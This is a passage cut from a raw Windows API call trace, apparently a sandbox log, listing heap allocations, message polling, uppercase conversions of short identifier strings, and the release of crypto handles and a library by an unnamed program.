0x24b1c38 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.479] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0267.480] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.480] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0267.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.480] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.480] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.480] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.480] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.480] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0267.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.480] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.481] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.481] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.481] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.481] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.481] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.481] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.482] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.482] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.482] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.482] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.482] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.482] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.483] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.483] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0267.483] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.483] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0267.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0267.484] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.484] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.484] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.484] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.484] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0267.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0267.484] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.484] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.485] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.485] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.485] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.485] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.485] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0267.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.485] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.486] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.486] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.486] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.486] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.486] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0267.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.487] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.487] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0267.487] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.487] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.487] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0267.488] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.488] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0267.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.488] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.488] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.488] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.488] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.488] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0267.488] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.488] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.489] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.489] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.489] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.489] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.489] FreeLibrary (hLibModule=0x74d40000) returned 1 [0267.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.489] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0267.489] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.489] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.490] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.490] CloseHandle (hObject=0x2cc) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 